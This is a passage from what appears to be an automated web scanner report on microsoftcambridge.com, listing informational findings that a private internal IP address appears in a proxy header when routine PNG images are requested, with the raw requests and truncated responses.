<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.177. http://microsoftcambridge.com/img/teams/about_ovr.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/teams/about_ovr.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/teams/about_ovr.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:14:19 GMT
Content-Length: 3156
Date: Sat, 26 Mar 2011 01:42:19 GMT
X-Varnish: 1939094219
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR................
....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.178. http://microsoftcambridge.com/img/teams/community.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/teams/community.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/teams/community.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:14:21 GMT
Content-Length: 3362
Date: Sat, 26 Mar 2011 01:42:12 GMT
X-Varnish: 1939092461
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...T............[....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.179. http://microsoftcambridge.com/img/teams/community_ovr.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/teams/community_ovr.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/teams/community_ovr.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:14:22 GMT
Content-Length: 3361
Date: Sat, 26 Mar 2011 01:42:19 GMT
X-Varnish: 1939094406
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...T............[....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.180. http://microsoftcambridge.com/img/teams/contact_us.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/teams/contact_us.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/teams/contact_us.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:14:23 GMT
Content-Length: 833
Date: Sat, 26 Mar 2011 01:42:19 GMT
X-Varnish: 1939094199
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...n........H;[.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..X...0.6....S..@f..8....`J.%.S.9..`&..p    .....O.7.
...eg4.Wki.w.Qf..........x...+...Q.....Q.:........B.ij..;^.~n..c.uf.
...[SNIP]...
24.181. http://microsoftcambridge.com/img/teams/contentpane_back.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/teams/contentpane_back.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/teams/contentpane_back.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:14:24 GMT
Content-Length: 2842
Date: Sat, 26 Mar 2011 01:40:29 GMT
X-Varnish: 1939060110
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR.............5.......tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.182. http://microsoftcambridge.com/img/teams/events.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/teams/events.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/teams/events.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:14:26 GMT
Content-Length: 3250
Date: Sat, 26 Mar 2011 01:42:11 GMT
X-Varnish: 1939092097
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...5.................tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.183. http://microsoftcambridge.com/img/teams/events_ovr.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/teams/events_ovr.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/teams/events_ovr.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:14:27 GMT
Content-Length: 3248
Date: Sat, 26 Mar 2011 01:42:19 GMT
X-Varnish: 1939094336
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...5.................tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.184. http://microsoftcambridge.com/img/teams/featured_person.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/teams/featured_person.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/teams/featured_person.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:14:28 GMT
Content-Length: 993
Date: Sat, 26 Mar 2011 01:42:18 GMT
X-Varnish: 1939093814
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR............'..g....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Y...0.....W....P ....G.........~..<.....!....J.O)..l%..#`8.%....G.)S..._G{....K.8..g~.iMKs6...7..<)zK........Wtk<......
...[SNIP]...
24.185. http://microsoftcambridge.com/img/teams/headerpane_back.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/teams/headerpane_back.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/teams/headerpane_back.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:14:29 GMT
Content-Length: 2841
Date: Sat, 26 Mar 2011 01:42:17 GMT
X-Varnish: 1939093671
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR..............9?u....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.186. http://microsoftcambridge.com/img/teams/latest_feeds.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/teams/latest_feeds.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/teams/latest_feeds.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:14:31 GMT
Content-Length: 721
Date: Sat, 26 Mar 2011 01:42:18 GMT
X-Varnish: 1939093934
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR............W......tEXtSoftware.Adobe ImageReadyq.e<...sIDATx..X.m.@.%..X...    *...W?............d.D....a.FH........Z.K."s9....>..E.??.8.>.,}...F?....u.........oB...t...s...M.|....h/.u
...[SNIP]...
24.187. http://microsoftcambridge.com/img/teams/latest_tweet.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/teams/latest_tweet.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/teams/latest_tweet.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Mon, 20 Jul 2009 20:53:29 GMT
Content-Length: 3522
Date: Sat, 26 Mar 2011 01:42:20 GMT
X-Varnish: 1939094604
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR.......".....>.......tEXtSoftware.Adobe ImageReadyq.e<..dIDATx..\il$.y}..L......22....6P(.qb.R..#..O
...cH..$A.@2.?I.H1b.1.XB,.0.G.a... .e.........j%.I-....}.U.z8L:.!9.r...PdOuuUW..
...[SNIP]...
24.188. http://microsoftcambridge.com/img/teams/people.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/teams/people.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/teams/people.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:14:33 GMT
Content-Length: 3146
Date: Sat, 26 Mar 2011 01:42:11 GMT
X-Varnish: 1939092088
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...6.........).N.....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.189. http://microsoftcambridge.com/img/teams/people_ovr.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/teams/people_ovr.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/teams/people_ovr.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:14:35 GMT
Content-Length: 3131
Date: Sat, 26 Mar 2011 01:42:19 GMT
X-Varnish: 1939094377
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...6.........).N.....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.190. http://microsoftcambridge.com/img/teams/search.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/teams/search.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/teams/search.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:14:37 GMT
Content-Length: 643
Date: Sat, 26 Mar 2011 01:42:18 GMT
X-Varnish: 1939093963
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...N.........fX.....tEXtSoftware.Adobe ImageReadyq.e<...%IDATx..W.m.@..d.[..@F......0B.!...~..@..e.n...\$.d...@k............i......G..W...>......3o.!v.~.~.|..........y..|Y.{.!xC.b.%..
...[SNIP]...
24.191. http://microsoftcambridge.com/img/teams/share.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/teams/share.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/teams/share.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:14:38 GMT
Content-Length: 583
Date: Sat, 26 Mar 2011 01:42:18 GMT
X-Varnish: 1939094008
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...D.........D......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..W.q.0.v.....@G0#.B3B.!..?..Oe.p....`.0B..>.t...Dw:..?.>}......d...i.rp.8..NN...<.a....n..q...}wz.z{..-p..h...h.v?\.....
...[SNIP]...
24.192. http://microsoftcambridge.com/img/teams/subscribe.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/teams/subscribe.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/teams/subscribe.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 26 Jun 2009 19:03:04 GMT
Content-Length: 3487
Date: Sat, 26 Mar 2011 01:42:18 GMT
X-Varnish: 1939093973
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...h........E%+H....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.193. http://microsoftcambridge.com/img/teams/teams.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/teams/teams.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/teams/teams.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:14:39 GMT
Content-Length: 3319
Date: Sat, 26 Mar 2011 01:42:11 GMT
X-Varnish: 1939092098
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR....... .....m.JG....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.194. http://microsoftcambridge.com/img/teams/working.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/teams/working.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/teams/working.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:14:41 GMT
Content-Length: 3529
Date: Sat, 26 Mar 2011 01:42:11 GMT
X-Varnish: 1939092091
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...l...........X.....tEXtSoftware.Adobe ImageReadyq.e<..
